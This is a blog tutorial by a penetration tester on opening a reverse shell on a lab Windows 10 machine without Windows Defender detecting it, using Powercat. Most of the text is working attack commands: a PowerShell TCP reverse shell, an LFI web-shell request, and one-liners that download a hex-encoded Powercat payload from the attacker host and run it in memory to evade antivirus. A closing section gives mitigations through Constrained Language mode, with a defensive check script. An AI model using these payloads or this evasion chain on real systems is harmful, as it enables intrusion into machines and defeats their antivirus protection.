Evade Windows Defender reverse shell detection with Powercat

Nol White Hat, published in System Weakness, May 19, 2022


Summary

In this article, I will show you how you can use Powercat to set up a reverse shell without being detected by the Windows Defender software.

Disclaimer

This article is for informational and educational purposes only, and for those who are willing and curious to learn about security and penetration testing. The content may not be used for illegal purposes. If you're ready to learn something new for the good, then read on.

Hello everyone who cares about cybersecurity! Welcome to my debut blog post. My name is Nol, what I do for a living is eat and penetration testing. Just kidding, when I have time I will spend it with my family. Since 1999, I have worked in the information technology industry and since November 2018 as a full-time penetration tester. I've always been passionate about security. I obtained my first defensive security certification in 2008 when I successfully passed Microsoft MCSE + Security certification. Since then, I have been involved in cybersecurity on both defensive and offensive levels.

Over the years, I have put together a number of ideas, instructions and tips. Now is the time to write them down for anyone else interested. As I mentioned earlier, use it for the sake of improving safety. For each approach, I will include recommendations to mitigate the risks.

My first blog is about a 'stealth' interactive shell. In other words, a shell that is not detected by the Windows Defender software. I'm going to show you what happens when you get caught trying to establish a reverse connection on a fully updated Windows 10 machine with built-in PowerShell, netcat or Metasploit commands. After that, I'll show you what you can do to set up a reverse connection without being stopped by the Microsoft Windows Defender software.

The POC consists of 2 machines: a victim (fully updated Windows 10) and an attacker (Kali Linux 2022.1 release). We only tested against the Microsoft Windows Defender software and did not test the payload against other vendors.

Victim:
- Windows 10 Professional [Version 10.0.19044.1645]
- IP-Address: 192.168.62.165
- Security: Default settings for antivirus detection and firewall rules.
- Software: Xampp for Windows and OWASP Mutillidae vulnerable web server.
- User context: POC user is a member of the local Users group.

Windows 10 Security Dashboard (screenshots): Windows Defender Antivirus settings, Windows Firewall

Attacker:
- Kali Linux
- IP-Address: 192.168.62.161

Initial foothold:

Our initial foothold consists of a PHP web shell loaded by a Local File Inclusion (LFI) vulnerability.

For example, we can use the web shell to execute the 'whoami' command:

http://192.168.62.165/mutillidae/index.php?page=../../../../../../../../Temp/simple-backdoor.php&cmd=whoami

Web shell access on the target Windows 10 machine

What happens if we don't do anything to evade the Windows Defender software?

Windows uses the Antimalware Scan Interface (AMSI) to detect the execution of malicious PowerShell code. For example, the following PowerShell code will set up a reverse connection and is flagged as malicious:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.62.161',443); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();} $client.Close();"

This code opens a TCP connection to the Kali attacker machine and gives it an interactive reverse shell.

Let's see what happens.

1. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Start a netcat listener (port 443).

rlwrap nc -nlvp 443

2. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)

Copy and paste the PowerShell code inside the web shell (?cmd=<paste code here>).

Result:

Nothing happened...

A possible cause is the fact that we did not URL encode the PowerShell payload. We can encode the PowerShell payload using an online URL encoder (https://meyerweb.com/eric/tools/dencoder/) and retry.

powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%27192.168.62.161%27%2C443)%3B%20%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%20%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%20%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%3B%7D%20%24client.Close()%3B%22%20

3. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)

Copy and paste the URL-encoded PowerShell code inside the web shell (?cmd=<paste code here>).

Result:

Nothing happens, the code is not executed.

4. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)

If we try to execute the same code in an interactive Windows command shell, we notice the following error:

This script contains malicious content and has been blocked by your antivirus software.

Furthermore, we tried to set up a reverse connection using netcat. This failed as well.

If you are ready to discover how we can get a reverse shell after these restrictions, then read on.

POC 01 Evade Windows Defender software with Powercat

Powercat (https://github.com/besimorhino/powercat) is a simple network utility used to perform low-level network communication operations. The tool is an implementation of the well-known Netcat in PowerShell.

To evade the Windows Defender antivirus software, we can encode the reverse shell payload with Powercat. Powercat has a useful feature to encode a command into a hexadecimal array. This way, some of the basic security checks can be bypassed.

Requirement:

The exploited user is allowed to execute PowerShell commands.

1. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Download powercat.ps1, execute powercat and create an encoded payload file (/tmp/shell-443.txt).

LHOST=192.168.62.161
LPORT=443
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > /tmp/$rshell

2. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Create a Windows batch file (/tmp/backup.bat). This batch file contains a PowerShell one liner that downloads the encoded Powercat code and executes it in memory.

LHOST=192.168.62.161
LPORT_web=80
rshell=shell-443.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${LHOST}:${LPORT_web}/${rshell}');iex 'powershell -E \$code'" >/tmp/backup.bat

3. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Launch a Python web server to stage the files backup.bat and shell-443.txt.

python3 -m http.server 80 --directory /tmp

4. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Start a netcat listener (port 443).

rlwrap nc -nlvp 443

5. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)

Execute a PowerShell one liner that will download the payload file (backup.bat) and execute the contents of this file. Copy and paste the one liner below as payload inside the web shell (?cmd=<payload>). URL encoding of the payload was not necessary.

START /B powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\Windows\Tasks\backup.bat');IEX 'c:\Windows\Tasks\backup.bat'

Result:

The required files are downloaded and we get an interactive shell!

It's also possible to skip step 2 (creating the /tmp/backup.bat file on Kali) and execute the Powercat payload directly.

5b. Performed on 192.168.62.165 (victim machine, Windows 10 web shell)

Execute a PowerShell one liner that runs the Powercat payload directly, without first downloading the file (backup.bat). Copy and paste the one liner below as payload inside the web shell (?cmd=<payload>).

START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://192.168.62.161:80/shell-443.txt');iex 'powershell -E $code'

Result:

We got an interactive shell!

Mitigation recommendations.

From a defensive perspective, it is difficult to stop this attack, but not impossible. The attack depends on the exploited user's ability to execute PowerShell commands. Disabling or restricting PowerShell will stop this attack.

Use PowerShell 'Constrained Language mode'

By default, PowerShell operates in Full Language mode, in which all functionality is available. This includes access to all language elements, cmdlets, and modules, as well as the file system and the network. Workstations can be configured to run PowerShell in 'Constrained Language mode', in which the ability to create COM and .NET objects is limited. For example, it is no longer possible to execute New-Object commands for arbitrary types. This may be undesirable for administrators, but it stops the Powercat attack.

1. Performed on 192.168.62.165 (victim machine, Windows 10)

Add a new system variable __PSLockDownPolicy with value 4 and reboot the workstation.

2. Performed on 192.168.62.165 (victim machine, Windows 10)

Login interactively and open a PowerShell command window. Execute the malicious PowerShell code from step 1.

Result:

It is no longer possible to execute the New-Object commands that the Powercat reverse shell connection depends on.
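The following PowerShell script is an added example, not part of the original post, that a defender can run on the workstation after the reboot in step 1 to confirm the mitigation actually took effect. It assumes only the __PSLockDownPolicy system variable from step 1, and checks the session's language mode plus whether New-Object of an arbitrary .NET type is refused.

```powershell
# Added example (not from the original post): verify the __PSLockDownPolicy
# mitigation described above. Run in a fresh PowerShell window after the reboot.

# 1. The machine-scope environment variable set in step 1 (4 = ConstrainedLanguage).
$policy = [Environment]::GetEnvironmentVariable('__PSLockDownPolicy', 'Machine')
if ($null -eq $policy) { $policy = '<not set>' }
"__PSLockDownPolicy (Machine scope): $policy"

# 2. The language mode PowerShell actually applied to this session.
$mode = $ExecutionContext.SessionState.LanguageMode
"Session language mode: $mode"

# 3. Functional check. In Constrained Language mode New-Object only accepts a
#    short allow-list of core types, so an arbitrary .NET type must be refused.
#    TcpClient is chosen because it is the first object the reverse shell
#    one-liner earlier in the post creates; no constructor argument is given,
#    so nothing is connected even when the session runs in Full Language mode.
$blocked = $false
try {
    $null = New-Object System.Net.Sockets.TcpClient -ErrorAction Stop
} catch {
    $blocked = $true
    "New-Object refused: $($_.Exception.Message)"
}

# 4. Verdict: all three indicators have to agree before the control is trusted.
if ($policy -eq '4' -and $mode -eq 'ConstrainedLanguage' -and $blocked) {
    'OK: this session runs in Constrained Language mode; the Powercat one-liner cannot create the objects it needs here.'
} else {
    'WARNING: Constrained Language mode is not in effect for this session; re-check the variable and reboot.'
}
```

Note that Microsoft documents the __PSLockDownPolicy variable as a testing mechanism rather than a hardened control: it only reaches processes started after the reboot and can be removed by an administrator, so for production enforcement Constrained Language mode should be applied through an application control policy such as AppLocker or WDAC.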

We also uploaded our payload file to virustotal.com, where it was analysed by 57 antivirus engines. Nine out of 57 classified our payload file (shell-443.txt) as malicious.

That was it! In my next blog, I will continue with another method of Windows Defender evasion. It gets interesting, because it is completely without the use of PowerShell.

And remember, don't put up the black hat!
